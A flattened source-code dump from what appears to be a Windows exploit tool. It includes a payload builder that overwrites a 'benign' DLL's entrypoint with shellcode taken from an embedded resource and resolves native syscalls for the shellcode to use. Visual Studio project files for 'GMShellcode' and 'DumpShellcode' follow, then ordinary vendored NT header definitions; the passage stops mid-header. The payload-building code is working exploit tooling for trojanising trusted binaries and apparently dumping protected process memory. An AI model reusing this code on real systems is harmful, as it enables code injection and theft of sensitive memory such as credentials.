(NtSetEvent_t)GetProcAddress(hNtdll, "NtSetEvent")); 69 | REQUIRE_IMPORT(pParams->pNtCreateSection = (NtCreateSection_t)GetProcAddress(hNtdll, "NtCreateSection")); 70 | REQUIRE_IMPORT(pParams->pNtMapViewOfSection = (NtMapViewOfSection_t)GetProcAddress(hNtdll, "NtMapViewOfSection")); 71 | 72 | // win32u 73 | REQUIRE_IMPORT(pParams->pNtUserHardErrorControl = (NtUserHardErrorControl_t)GetProcAddress(hWin32U, "NtUserHardErrorControl")); 74 | REQUIRE_IMPORT(pParams->pNtUserSetInformationThread = (NtUserSetInformationThread_t)GetProcAddress(hWin32U, "NtUserSetInformationThread")); 75 | 76 | return true; 77 | 78 | IMPORT_FAILURE: 79 | Log(Error, "Failed to resolve a payload import"); 80 | return false; 81 | } 82 | 83 | // Find DLL entrypoint and overwrite it with shellcode 84 | bool BuildPayload( 85 | HANDLE hBenignDll, 86 | std::string & payloadBuffer) 87 | { 88 | std::string buf; 89 | LARGE_INTEGER dllSize = { 0, }; 90 | DWORD dwBytesRead = 0; 91 | PCHAR pEntrypoint = NULL; 92 | DWORD bytesWritten = 0; 93 | SHELLCODE_PARAMS params = { 0, }; 94 | SIZE_T availableSpace = 0; 95 | const uint8_t magic[] = MAGIC_NOPS; 96 | DWORD curOffset = 0; 97 | 98 | // Read entire source file into buffer 99 | SetFilePointer(hBenignDll, 0, NULL, SEEK_SET); 100 | GetFileSizeEx(hBenignDll, &dllSize); 101 | buf.resize(dllSize.QuadPart); 102 | 103 | if (!ReadFile(hBenignDll, &buf[0], dllSize.LowPart, &dwBytesRead, NULL) || 104 | (dwBytesRead != dllSize.QuadPart)) 105 | { 106 | Log(Error, "BuildPayload: ReadFile failed with GLE %u", GetLastError()); 107 | return false; 108 | } 109 | 110 | pEntrypoint = (PCHAR)FindEntrypointVA(buf); 111 | if (!pEntrypoint) 112 | { 113 | return false; 114 | } 115 | 116 | availableSpace = &buf[buf.size()] - (char*)pEntrypoint; 117 | 118 | // Write magic NOPs 119 | memcpy(pEntrypoint, magic, sizeof(magic)); 120 | curOffset += sizeof(magic); 121 | 122 | // Overwrite entrypoint with shellcode embedded in our resource section 123 | if (!WriteShellcode(MAKEINTRESOURCE(RES_PAYLOAD), pEntrypoint + curOffset, availableSpace, bytesWritten)) 124 | { 125 | return false; 126 | } 127 | curOffset += bytesWritten; 128 | 129 | // Create a SHELLCODE_PARAMS and write it after the shellcode 130 | if (!InitShellcodeParams(¶ms)) 131 | { 132 | return false; 133 | } 134 | 135 | if (pEntrypoint + curOffset + sizeof(params) > buf.data() + buf.size() - 1) 136 | { 137 | Log(Error, "Not enough space for SHELLCODE_PARAMS"); 138 | return false; 139 | } 140 | 141 | params.mySize = curOffset + sizeof(params); 142 | 143 | memcpy((pEntrypoint) + curOffset, ¶ms, sizeof(params)); 144 | 145 | payloadBuffer = std::move(buf); 146 | 147 | return true; 148 | } 149 | -------------------------------------------------------------------------------- /GMShellcode/GMShellcode.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | 16.0 15 | Win32Proj 16 | {4ac42f11-3b8d-49fc-bd5f-341e42488630} 17 | PayloadShellcode 18 | 10.0 19 | 20 | 21 | 22 | Application 23 | true 24 | v142 25 | Unicode 26 | 27 | 28 | Application 29 | false 30 | v142 31 | true 32 | Unicode 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | false 48 | 49 | 50 | 51 | 52 | false 53 | 54 | 55 | 56 | 57 | 58 | Level3 59 | false 60 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 61 | true 62 | false 63 | false 64 | Default 65 | false 66 | true 67 | false 68 | $(SolutionDir)/phnt/include 69 | ProgramDatabase 70 | 71 | 72 | Console 73 | true 74 | false 75 | false 76 | Default 77 | FunctionOrder.txt 78 | GMShellcode.def 79 | 80 | 81 | 82 | 83 | 84 | 85 | $(TargetPath) 86 | 87 | 88 | 89 | 90 | Level3 91 | true 92 | false 93 | false 94 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 95 | true 96 | Disabled 97 | false 98 | false 99 | false 100 | false 101 | $(SolutionDir)/phnt/include 102 | 103 | 104 | Console 105 | false 106 | false 107 | true 108 | Default 109 | FunctionOrder.txt 110 | GMShellcode.def 111 | 112 | 113 | 114 | 115 | 116 | 117 | $(TargetPath) 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | -------------------------------------------------------------------------------- /DumpShellcode/DumpShellcode.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | x64 7 | 8 | 9 | Release 10 | x64 11 | 12 | 13 | 14 | 16.0 15 | Win32Proj 16 | {48dbc3f5-99e0-4904-b83e-58419768f52e} 17 | DumpShellcode 18 | 10.0 19 | 20 | 21 | 22 | Application 23 | true 24 | v142 25 | Unicode 26 | 27 | 28 | Application 29 | false 30 | v142 31 | true 32 | Unicode 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | false 48 | 49 | 50 | 51 | 52 | false 53 | 54 | 55 | 56 | 57 | 58 | Level3 59 | false 60 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 61 | true 62 | false 63 | false 64 | Default 65 | false 66 | true 67 | false 68 | ProgramDatabase 69 | $(SolutionDir)/phnt/include 70 | 71 | 72 | Console 73 | true 74 | false 75 | false 76 | Default 77 | FunctionOrder.txt 78 | DumpShellcode.def 79 | 80 | 81 | 82 | 83 | 84 | 85 | $(TargetPath) 86 | 87 | 88 | 89 | 90 | Level3 91 | true 92 | false 93 | false 94 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 95 | true 96 | Disabled 97 | false 98 | false 99 | false 100 | false 101 | $(SolutionDir)/phnt/include 102 | 103 | 104 | Console 105 | false 106 | false 107 | true 108 | Default 109 | FunctionOrder.txt 110 | DumpShellcode.def 111 | 112 | 113 | 114 | 115 | 116 | 117 | $(TargetPath) 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | -------------------------------------------------------------------------------- /phnt/include/ntdbg.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Debugger support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTDBG_H 8 | #define _NTDBG_H 9 | 10 | // Debugging 11 | 12 | NTSYSAPI 13 | VOID 14 | NTAPI 15 | DbgUserBreakPoint( 16 | VOID 17 | ); 18 | 19 | NTSYSAPI 20 | VOID 21 | NTAPI 22 | DbgBreakPoint( 23 | VOID 24 | ); 25 | 26 | NTSYSAPI 27 | VOID 28 | NTAPI 29 | DbgBreakPointWithStatus( 30 | _In_ ULONG Status 31 | ); 32 | 33 | #define DBG_STATUS_CONTROL_C 1 34 | #define DBG_STATUS_SYSRQ 2 35 | #define DBG_STATUS_BUGCHECK_FIRST 3 36 | #define DBG_STATUS_BUGCHECK_SECOND 4 37 | #define DBG_STATUS_FATAL 5 38 | #define DBG_STATUS_DEBUG_CONTROL 6 39 | #define DBG_STATUS_WORKER 7 40 | 41 | NTSYSAPI 42 | ULONG 43 | STDAPIVCALLTYPE 44 | DbgPrint( 45 | _In_z_ _Printf_format_string_ PCSTR Format, 46 | ... 47 | ); 48 | 49 | NTSYSAPI 50 | ULONG 51 | STDAPIVCALLTYPE 52 | DbgPrintEx( 53 | _In_ ULONG ComponentId, 54 | _In_ ULONG Level, 55 | _In_z_ _Printf_format_string_ PCSTR Format, 56 | ... 57 | ); 58 | 59 | NTSYSAPI 60 | ULONG 61 | NTAPI 62 | vDbgPrintEx( 63 | _In_ ULONG ComponentId, 64 | _In_ ULONG Level, 65 | _In_z_ PCCH Format, 66 | _In_ va_list arglist 67 | ); 68 | 69 | NTSYSAPI 70 | ULONG 71 | NTAPI 72 | vDbgPrintExWithPrefix( 73 | _In_z_ PCCH Prefix, 74 | _In_ ULONG ComponentId, 75 | _In_ ULONG Level, 76 | _In_z_ PCCH Format, 77 | _In_ va_list arglist 78 | ); 79 | 80 | NTSYSAPI 81 | NTSTATUS 82 | NTAPI 83 | DbgQueryDebugFilterState( 84 | _In_ ULONG ComponentId, 85 | _In_ ULONG Level 86 | ); 87 | 88 | NTSYSAPI 89 | NTSTATUS 90 | NTAPI 91 | DbgSetDebugFilterState( 92 | _In_ ULONG ComponentId, 93 | _In_ ULONG Level, 94 | _In_ BOOLEAN State 95 | ); 96 | 97 | NTSYSAPI 98 | ULONG 99 | NTAPI 100 | DbgPrompt( 101 | _In_ PCCH Prompt, 102 | _Out_writes_bytes_(Length) PCH Response, 103 | _In_ ULONG Length 104 | ); 105 | 106 | // Definitions 107 | 108 | typedef struct _DBGKM_EXCEPTION 109 | { 110 | EXCEPTION_RECORD ExceptionRecord; 111 | ULONG FirstChance; 112 | } DBGKM_EXCEPTION, *PDBGKM_EXCEPTION; 113 | 114 | typedef struct _DBGKM_CREATE_THREAD 115 | { 116 | ULONG SubSystemKey; 117 | PVOID StartAddress; 118 | } DBGKM_CREATE_THREAD, *PDBGKM_CREATE_THREAD; 119 | 120 | typedef struct _DBGKM_CREATE_PROCESS 121 | { 122 | ULONG SubSystemKey; 123 | HANDLE FileHandle; 124 | PVOID BaseOfImage; 125 | ULONG DebugInfoFileOffset; 126 | ULONG DebugInfoSize; 127 | DBGKM_CREATE_THREAD InitialThread; 128 | } DBGKM_CREATE_PROCESS, *PDBGKM_CREATE_PROCESS; 129 | 130 | typedef struct _DBGKM_EXIT_THREAD 131 | { 132 | NTSTATUS ExitStatus; 133 | } DBGKM_EXIT_THREAD, *PDBGKM_EXIT_THREAD; 134 | 135 | typedef struct _DBGKM_EXIT_PROCESS 136 | { 137 | NTSTATUS ExitStatus; 138 | } DBGKM_EXIT_PROCESS, *PDBGKM_EXIT_PROCESS; 139 | 140 | typedef struct _DBGKM_LOAD_DLL 141 | { 142 | HANDLE FileHandle; 143 | PVOID BaseOfDll; 144 | ULONG DebugInfoFileOffset; 145 | ULONG DebugInfoSize; 146 | PVOID NamePointer; 147 | } DBGKM_LOAD_DLL, *PDBGKM_LOAD_DLL; 148 | 149 | typedef struct _DBGKM_UNLOAD_DLL 150 | { 151 | PVOID BaseAddress; 152 | } DBGKM_UNLOAD_DLL, *PDBGKM_UNLOAD_DLL; 153 | 154 | typedef enum _DBG_STATE 155 | { 156 | DbgIdle, 157 | DbgReplyPending, 158 | DbgCreateThreadStateChange, 159 | DbgCreateProcessStateChange, 160 | DbgExitThreadStateChange, 161 | DbgExitProcessStateChange, 162 | DbgExceptionStateChange, 163 | DbgBreakpointStateChange, 164 | DbgSingleStepStateChange, 165 | DbgLoadDllStateChange, 166 | DbgUnloadDllStateChange 167 | } DBG_STATE, *PDBG_STATE; 168 | 169 | typedef struct _DBGUI_CREATE_THREAD 170 | { 171 | HANDLE HandleToThread; 172 | DBGKM_CREATE_THREAD NewThread; 173 | } DBGUI_CREATE_THREAD, *PDBGUI_CREATE_THREAD; 174 | 175 | typedef struct _DBGUI_CREATE_PROCESS 176 | { 177 | HANDLE HandleToProcess; 178 | HANDLE HandleToThread; 179 | DBGKM_CREATE_PROCESS NewProcess; 180 | } DBGUI_CREATE_PROCESS, *PDBGUI_CREATE_PROCESS; 181 | 182 | typedef struct _DBGUI_WAIT_STATE_CHANGE 183 | { 184 | DBG_STATE NewState; 185 | CLIENT_ID AppClientId; 186 | union 187 | { 188 | DBGKM_EXCEPTION Exception; 189 | DBGUI_CREATE_THREAD CreateThread; 190 | DBGUI_CREATE_PROCESS CreateProcessInfo; 191 | DBGKM_EXIT_THREAD ExitThread; 192 | DBGKM_EXIT_PROCESS ExitProcess; 193 | DBGKM_LOAD_DLL LoadDll; 194 | DBGKM_UNLOAD_DLL UnloadDll; 195 | } StateInfo; 196 | } DBGUI_WAIT_STATE_CHANGE, *PDBGUI_WAIT_STATE_CHANGE; 197 | 198 | #define DEBUG_READ_EVENT 0x0001 199 | #define DEBUG_PROCESS_ASSIGN 0x0002 200 | #define DEBUG_SET_INFORMATION 0x0004 201 | #define DEBUG_QUERY_INFORMATION 0x0008 202 | #define DEBUG_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | \ 203 | DEBUG_READ_EVENT | DEBUG_PROCESS_ASSIGN | DEBUG_SET_INFORMATION | \ 204 | DEBUG_QUERY_INFORMATION) 205 | 206 | #define DEBUG_KILL_ON_CLOSE 0x1 207 | 208 | typedef enum _DEBUGOBJECTINFOCLASS 209 | { 210 | DebugObjectUnusedInformation, 211 | DebugObjectKillProcessOnExitInformation, // s: ULONG 212 | MaxDebugObjectInfoClass 213 | } DEBUGOBJECTINFOCLASS, *PDEBUGOBJECTINFOCLASS; 214 | 215 | // System calls 216 | 217 | NTSYSCALLAPI 218 | NTSTATUS 219 | NTAPI 220 | NtCreateDebugObject( 221 | _Out_ PHANDLE DebugObjectHandle, 222 | _In_ ACCESS_MASK DesiredAccess, 223 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 224 | _In_ ULONG Flags 225 | ); 226 | 227 | NTSYSCALLAPI 228 | NTSTATUS 229 | NTAPI 230 | NtDebugActiveProcess( 231 | _In_ HANDLE ProcessHandle, 232 | _In_ HANDLE DebugObjectHandle 233 | ); 234 | 235 | NTSYSCALLAPI 236 | NTSTATUS 237 | NTAPI 238 | NtDebugContinue( 239 | _In_ HANDLE DebugObjectHandle, 240 | _In_ PCLIENT_ID ClientId, 241 | _In_ NTSTATUS ContinueStatus 242 | ); 243 | 244 | NTSYSCALLAPI 245 | NTSTATUS 246 | NTAPI 247 | NtRemoveProcessDebug( 248 | _In_ HANDLE ProcessHandle, 249 | _In_ HANDLE DebugObjectHandle 250 | ); 251 | 252 | NTSYSCALLAPI 253 | NTSTATUS 254 | NTAPI 255 | NtSetInformationDebugObject( 256 | _In_ HANDLE DebugObjectHandle, 257 | _In_ DEBUGOBJECTINFOCLASS DebugObjectInformationClass, 258 | _In_ PVOID DebugInformation, 259 | _In_ ULONG DebugInformationLength, 260 | _Out_opt_ PULONG ReturnLength 261 | ); 262 | 263 | NTSYSCALLAPI 264 | NTSTATUS 265 | NTAPI 266 | NtWaitForDebugEvent( 267 | _In_ HANDLE DebugObjectHandle, 268 | _In_ BOOLEAN Alertable, 269 | _In_opt_ PLARGE_INTEGER Timeout, 270 | _Out_ PDBGUI_WAIT_STATE_CHANGE WaitStateChange 271 | ); 272 | 273 | // Debugging UI 274 | 275 | NTSYSAPI 276 | NTSTATUS 277 | NTAPI 278 | DbgUiConnectToDbg( 279 | VOID 280 | ); 281 | 282 | NTSYSAPI 283 | HANDLE 284 | NTAPI 285 | DbgUiGetThreadDebugObject( 286 | VOID 287 | ); 288 | 289 | NTSYSAPI 290 | VOID 291 | NTAPI 292 | DbgUiSetThreadDebugObject( 293 | _In_ HANDLE DebugObject 294 | ); 295 | 296 | NTSYSAPI 297 | NTSTATUS 298 | NTAPI 299 | DbgUiWaitStateChange( 300 | _Out_ PDBGUI_WAIT_STATE_CHANGE StateChange, 301 | _In_opt_ PLARGE_INTEGER Timeout 302 | ); 303 | 304 | NTSYSAPI 305 | NTSTATUS 306 | NTAPI 307 | DbgUiContinue( 308 | _In_ PCLIENT_ID AppClientId, 309 | _In_ NTSTATUS ContinueStatus 310 | ); 311 | 312 | NTSYSAPI 313 | NTSTATUS 314 | NTAPI 315 | DbgUiStopDebugging( 316 | _In_ HANDLE Process 317 | ); 318 | 319 | NTSYSAPI 320 | NTSTATUS 321 | NTAPI 322 | DbgUiDebugActiveProcess( 323 | _In_ HANDLE Process 324 | ); 325 | 326 | NTSYSAPI 327 | VOID 328 | NTAPI 329 | DbgUiRemoteBreakin( 330 | _In_ PVOID Context 331 | ); 332 | 333 | NTSYSAPI 334 | NTSTATUS 335 | NTAPI 336 | DbgUiIssueRemoteBreakin( 337 | _In_ HANDLE Process 338 | ); 339 | 340 | NTSYSAPI 341 | NTSTATUS 342 | NTAPI 343 | DbgUiConvertStateChangeStructure( 344 | _In_ PDBGUI_WAIT_STATE_CHANGE StateChange, 345 | _Out_ LPDEBUG_EVENT DebugEvent 346 | ); 347 | 348 | NTSYSAPI 349 | NTSTATUS 350 | NTAPI 351 | DbgUiConvertStateChangeStructureEx( 352 | _In_ PDBGUI_WAIT_STATE_CHANGE StateChange, 353 | _Out_ LPDEBUG_EVENT DebugEvent 354 | ); 355 | 356 | struct _EVENT_FILTER_DESCRIPTOR; 357 | 358 | typedef VOID (NTAPI *PENABLECALLBACK)( 359 | _In_ LPCGUID SourceId, 360 | _In_ ULONG IsEnabled, 361 | _In_ UCHAR Level, 362 | _In_ ULONGLONG MatchAnyKeyword, 363 | _In_ ULONGLONG MatchAllKeyword, 364 | _In_opt_ struct _EVENT_FILTER_DESCRIPTOR *FilterData, 365 | _Inout_opt_ PVOID CallbackContext 366 | ); 367 | 368 | typedef ULONGLONG REGHANDLE, *PREGHANDLE; 369 | 370 | NTSYSAPI 371 | NTSTATUS 372 | NTAPI 373 | EtwEventRegister( 374 | _In_ LPCGUID ProviderId, 375 | _In_opt_ PENABLECALLBACK EnableCallback, 376 | _In_opt_ PVOID CallbackContext, 377 | _Out_ PREGHANDLE RegHandle 378 | ); 379 | 380 | #endif 381 | -------------------------------------------------------------------------------- /phnt/include/phnt_ntdef.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Native definition support 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _PHNT_NTDEF_H 8 | #define _PHNT_NTDEF_H 9 | 10 | #ifndef _NTDEF_ 11 | #define _NTDEF_ 12 | 13 | // This header file provides basic NT types not included in Win32. If you have included winnt.h 14 | // (perhaps indirectly), you must use this file instead of ntdef.h. 15 | 16 | #ifndef NOTHING 17 | #define NOTHING 18 | #endif 19 | 20 | // Basic types 21 | 22 | typedef struct _QUAD 23 | { 24 | union 25 | { 26 | __int64 UseThisFieldToCopy; 27 | double DoNotUseThisField; 28 | }; 29 | } QUAD, *PQUAD; 30 | 31 | // This isn't in NT, but it's useful. 32 | typedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT) _QUAD_PTR 33 | { 34 | ULONG_PTR DoNotUseThisField1; 35 | ULONG_PTR DoNotUseThisField2; 36 | } QUAD_PTR, *PQUAD_PTR; 37 | 38 | typedef ULONG LOGICAL; 39 | typedef ULONG *PLOGICAL; 40 | 41 | typedef _Return_type_success_(return >= 0) LONG NTSTATUS; 42 | typedef NTSTATUS *PNTSTATUS; 43 | 44 | // Cardinal types 45 | 46 | typedef char CCHAR; 47 | typedef short CSHORT; 48 | typedef ULONG CLONG; 49 | 50 | typedef CCHAR *PCCHAR; 51 | typedef CSHORT *PCSHORT; 52 | typedef CLONG *PCLONG; 53 | 54 | typedef PCSTR PCSZ; 55 | 56 | // Specific 57 | 58 | typedef UCHAR KIRQL, *PKIRQL; 59 | typedef LONG KPRIORITY, *PKPRIORITY; 60 | typedef USHORT RTL_ATOM, *PRTL_ATOM; 61 | 62 | typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS; 63 | 64 | typedef struct _LARGE_INTEGER_128 65 | { 66 | LONGLONG QuadPart[2]; 67 | } LARGE_INTEGER_128, *PLARGE_INTEGER_128; 68 | 69 | // NT status macros 70 | 71 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 72 | #define NT_INFORMATION(Status) ((((ULONG)(Status)) >> 30) == 1) 73 | #define NT_WARNING(Status) ((((ULONG)(Status)) >> 30) == 2) 74 | #define NT_ERROR(Status) ((((ULONG)(Status)) >> 30) == 3) 75 | 76 | #define NT_FACILITY_MASK 0xfff 77 | #define NT_FACILITY_SHIFT 16 78 | #define NT_FACILITY(Status) ((((ULONG)(Status)) >> NT_FACILITY_SHIFT) & NT_FACILITY_MASK) 79 | 80 | #define NT_NTWIN32(Status) (NT_FACILITY(Status) == FACILITY_NTWIN32) 81 | #define WIN32_FROM_NTSTATUS(Status) (((ULONG)(Status)) & 0xffff) 82 | 83 | // Functions 84 | 85 | #ifndef _WIN64 86 | #define FASTCALL __fastcall 87 | #else 88 | #define FASTCALL 89 | #endif 90 | 91 | // Synchronization enumerations 92 | 93 | typedef enum _EVENT_TYPE 94 | { 95 | NotificationEvent, 96 | SynchronizationEvent 97 | } EVENT_TYPE; 98 | 99 | typedef enum _TIMER_TYPE 100 | { 101 | NotificationTimer, 102 | SynchronizationTimer 103 | } TIMER_TYPE; 104 | 105 | typedef enum _WAIT_TYPE 106 | { 107 | WaitAll, 108 | WaitAny, 109 | WaitNotification 110 | } WAIT_TYPE; 111 | 112 | // Strings 113 | 114 | typedef struct _STRING 115 | { 116 | USHORT Length; 117 | USHORT MaximumLength; 118 | _Field_size_bytes_part_opt_(MaximumLength, Length) PCHAR Buffer; 119 | } STRING, *PSTRING, ANSI_STRING, *PANSI_STRING, OEM_STRING, *POEM_STRING; 120 | 121 | typedef STRING UTF8_STRING; 122 | typedef PSTRING PUTF8_STRING; 123 | 124 | typedef const STRING *PCSTRING; 125 | typedef const ANSI_STRING *PCANSI_STRING; 126 | typedef const OEM_STRING *PCOEM_STRING; 127 | 128 | typedef struct _UNICODE_STRING 129 | { 130 | USHORT Length; 131 | USHORT MaximumLength; 132 | _Field_size_bytes_part_(MaximumLength, Length) PWCH Buffer; 133 | } UNICODE_STRING, *PUNICODE_STRING; 134 | 135 | typedef const UNICODE_STRING *PCUNICODE_STRING; 136 | 137 | #define RTL_CONSTANT_STRING(s) { sizeof(s) - sizeof((s)[0]), sizeof(s), s } 138 | 139 | // Balanced tree node 140 | 141 | #define RTL_BALANCED_NODE_RESERVED_PARENT_MASK 3 142 | 143 | typedef struct _RTL_BALANCED_NODE 144 | { 145 | union 146 | { 147 | struct _RTL_BALANCED_NODE *Children[2]; 148 | struct 149 | { 150 | struct _RTL_BALANCED_NODE *Left; 151 | struct _RTL_BALANCED_NODE *Right; 152 | }; 153 | }; 154 | union 155 | { 156 | UCHAR Red : 1; 157 | UCHAR Balance : 2; 158 | ULONG_PTR ParentValue; 159 | }; 160 | } RTL_BALANCED_NODE, *PRTL_BALANCED_NODE; 161 | 162 | #define RTL_BALANCED_NODE_GET_PARENT_POINTER(Node) \ 163 | ((PRTL_BALANCED_NODE)((Node)->ParentValue & ~RTL_BALANCED_NODE_RESERVED_PARENT_MASK)) 164 | 165 | // Portability 166 | 167 | typedef struct _SINGLE_LIST_ENTRY32 168 | { 169 | ULONG Next; 170 | } SINGLE_LIST_ENTRY32, *PSINGLE_LIST_ENTRY32; 171 | 172 | typedef struct _STRING32 173 | { 174 | USHORT Length; 175 | USHORT MaximumLength; 176 | ULONG Buffer; 177 | } STRING32, *PSTRING32; 178 | 179 | typedef STRING32 UNICODE_STRING32, *PUNICODE_STRING32; 180 | typedef STRING32 ANSI_STRING32, *PANSI_STRING32; 181 | 182 | typedef struct _STRING64 183 | { 184 | USHORT Length; 185 | USHORT MaximumLength; 186 | ULONGLONG Buffer; 187 | } STRING64, *PSTRING64; 188 | 189 | typedef STRING64 UNICODE_STRING64, *PUNICODE_STRING64; 190 | typedef STRING64 ANSI_STRING64, *PANSI_STRING64; 191 | 192 | // Object attributes 193 | 194 | #define OBJ_PROTECT_CLOSE 0x00000001 195 | #define OBJ_INHERIT 0x00000002 196 | #define OBJ_AUDIT_OBJECT_CLOSE 0x00000004 197 | #define OBJ_PERMANENT 0x00000010 198 | #define OBJ_EXCLUSIVE 0x00000020 199 | #define OBJ_CASE_INSENSITIVE 0x00000040 200 | #define OBJ_OPENIF 0x00000080 201 | #define OBJ_OPENLINK 0x00000100 202 | #define OBJ_KERNEL_HANDLE 0x00000200 203 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400 204 | #define OBJ_IGNORE_IMPERSONATED_DEVICEMAP 0x00000800 205 | #define OBJ_DONT_REPARSE 0x00001000 206 | #define OBJ_VALID_ATTRIBUTES 0x00001ff2 207 | 208 | typedef struct _OBJECT_ATTRIBUTES 209 | { 210 | ULONG Length; 211 | HANDLE RootDirectory; 212 | PUNICODE_STRING ObjectName; 213 | ULONG Attributes; 214 | PVOID SecurityDescriptor; // PSECURITY_DESCRIPTOR; 215 | PVOID SecurityQualityOfService; // PSECURITY_QUALITY_OF_SERVICE 216 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 217 | 218 | typedef const OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES; 219 | 220 | #define InitializeObjectAttributes(p, n, a, r, s) { \ 221 | (p)->Length = sizeof(OBJECT_ATTRIBUTES); \ 222 | (p)->RootDirectory = r; \ 223 | (p)->Attributes = a; \ 224 | (p)->ObjectName = n; \ 225 | (p)->SecurityDescriptor = s; \ 226 | (p)->SecurityQualityOfService = NULL; \ 227 | } 228 | 229 | #define RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) { sizeof(OBJECT_ATTRIBUTES), NULL, n, a, NULL, NULL } 230 | #define RTL_INIT_OBJECT_ATTRIBUTES(n, a) RTL_CONSTANT_OBJECT_ATTRIBUTES(n, a) 231 | 232 | #define OBJ_NAME_PATH_SEPARATOR ((WCHAR)L'\\') 233 | #define OBJ_NAME_ALTPATH_SEPARATOR ((WCHAR)L'/') 234 | 235 | // Portability 236 | 237 | typedef struct _OBJECT_ATTRIBUTES64 238 | { 239 | ULONG Length; 240 | ULONG64 RootDirectory; 241 | ULONG64 ObjectName; 242 | ULONG Attributes; 243 | ULONG64 SecurityDescriptor; 244 | ULONG64 SecurityQualityOfService; 245 | } OBJECT_ATTRIBUTES64, *POBJECT_ATTRIBUTES64; 246 | 247 | typedef const OBJECT_ATTRIBUTES64 *PCOBJECT_ATTRIBUTES64; 248 | 249 | typedef struct _OBJECT_ATTRIBUTES32 250 | { 251 | ULONG Length; 252 | ULONG RootDirectory; 253 | ULONG ObjectName; 254 | ULONG Attributes; 255 | ULONG SecurityDescriptor; 256 | ULONG SecurityQualityOfService; 257 | } OBJECT_ATTRIBUTES32, *POBJECT_ATTRIBUTES32; 258 | 259 | typedef const OBJECT_ATTRIBUTES32 *PCOBJECT_ATTRIBUTES32; 260 | 261 | // Product types 262 | 263 | typedef enum _NT_PRODUCT_TYPE 264 | { 265 | NtProductWinNt = 1, 266 | NtProductLanManNt, 267 | NtProductServer 268 | } NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE; 269 | 270 | typedef enum _SUITE_TYPE 271 | { 272 | SmallBusiness, 273 | Enterprise, 274 | BackOffice, 275 | CommunicationServer, 276 | TerminalServer, 277 | SmallBusinessRestricted, 278 | EmbeddedNT, 279 | DataCenter, 280 | SingleUserTS, 281 | Personal, 282 | Blade, 283 | EmbeddedRestricted, 284 | SecurityAppliance, 285 | StorageServer, 286 | ComputeServer, 287 | WHServer, 288 | PhoneNT, 289 | MaxSuiteType 290 | } SUITE_TYPE; 291 | 292 | // Specific 293 | 294 | typedef struct _CLIENT_ID 295 | { 296 | HANDLE UniqueProcess; 297 | HANDLE UniqueThread; 298 | } CLIENT_ID, *PCLIENT_ID; 299 | 300 | typedef struct _CLIENT_ID32 301 | { 302 | ULONG UniqueProcess; 303 | ULONG UniqueThread; 304 | } CLIENT_ID32, *PCLIENT_ID32; 305 | 306 | typedef struct _CLIENT_ID64 307 | { 308 | ULONGLONG UniqueProcess; 309 | ULONGLONG UniqueThread; 310 | } CLIENT_ID64, *PCLIENT_ID64; 311 | 312 | #include 313 | 314 | typedef struct _KSYSTEM_TIME 315 | { 316 | ULONG LowPart; 317 | LONG High1Time; 318 | LONG High2Time; 319 | } KSYSTEM_TIME, *PKSYSTEM_TIME; 320 | 321 | #include 322 | 323 | // NT macros used to test, set and clear flags 324 | #ifndef FlagOn 325 | #define FlagOn(_F, _SF) ((_F) & (_SF)) 326 | #endif 327 | #ifndef BooleanFlagOn 328 | #define BooleanFlagOn(F, SF) ((BOOLEAN)(((F) & (SF)) != 0)) 329 | #endif 330 | #ifndef SetFlag 331 | #define SetFlag(_F, _SF) ((_F) |= (_SF)) 332 | #endif 333 | #ifndef ClearFlag 334 | #define ClearFlag(_F, _SF) ((_F) &= ~(_SF)) 335 | #endif 336 | 337 | #endif 338 | 339 | #endif 340 | -------------------------------------------------------------------------------- /phnt/include/ntpfapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Prefetcher (Superfetch) support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTPFAPI_H 8 | #define _NTPFAPI_H 9 | 10 | // begin_private 11 | 12 | // Prefetch 13 | 14 | typedef enum _PF_BOOT_PHASE_ID 15 | { 16 | PfKernelInitPhase = 0, 17 | PfBootDriverInitPhase = 90, 18 | PfSystemDriverInitPhase = 120, 19 | PfSessionManagerInitPhase = 150, 20 | PfSMRegistryInitPhase = 180, 21 | PfVideoInitPhase = 210, 22 | PfPostVideoInitPhase = 240, 23 | PfBootAcceptedRegistryInitPhase = 270, 24 | PfUserShellReadyPhase = 300, 25 | PfMaxBootPhaseId = 900 26 | } PF_BOOT_PHASE_ID; 27 | 28 | typedef enum _PF_ENABLE_STATUS 29 | { 30 | PfSvNotSpecified, 31 | PfSvEnabled, 32 | PfSvDisabled, 33 | PfSvMaxEnableStatus 34 | } PF_ENABLE_STATUS; 35 | 36 | typedef struct _PF_TRACE_LIMITS 37 | { 38 | ULONG MaxNumPages; 39 | ULONG MaxNumSections; 40 | LONGLONG TimerPeriod; 41 | } PF_TRACE_LIMITS, *PPF_TRACE_LIMITS; 42 | 43 | typedef struct 